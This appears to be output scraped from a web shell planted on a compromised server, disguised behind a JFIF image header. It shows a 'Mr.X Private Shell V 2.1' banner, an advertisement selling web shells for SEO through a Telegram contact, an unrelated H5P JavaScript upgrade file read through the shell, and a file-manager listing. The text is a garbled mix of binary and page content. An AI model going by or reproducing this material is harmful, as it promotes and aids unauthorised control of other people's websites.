����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
var H5PUpgrades = H5PUpgrades || {};
H5PUpgrades['H5P.Column'] = (function () {
return {
1: {
/**
* Asynchronous content upgrade hook.
* Upgrades content parameters to support Column 1.10.
*
* - Converts H5P.AppearIn to H5P.AdvancedText
*
* @param {Object} parameters
* @param {function} finished
*/
10: function (parameters, finished) {
if (parameters && parameters.content) {
// Go through content
for (var i = 0; i < parameters.content.length; i++) {
if (parameters.content[i] && parameters.content[i].content) {
const content = parameters.content[i].content;
if (content.library && content.library.split(' ')[0] === 'H5P.AppearIn') {
content.library = 'H5P.AdvancedText 1.1';
content.params = content.params || {};
let roomName = '';
if (content.params.appearRoom) {
roomName = content.params.appearRoom;
}
content.params.text = '<p>AppearIn support for embedded rooms has been deprecated and is no longer maintained. Access your room in a new tab with the following <a target="_blank" href="https://appear.in/' + roomName + '">link.</a></p>';
}
}
}
}
// Done
finished(null, parameters);
}
}
};
})();
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| c7755bfe4d242c5197e1546722f1cc020ff10590 | File | 1.41 KB | 0666 |
|
| c775cf3e409c9e395a45e20453a37e7702d809ad | File | 2.07 KB | 0666 |
|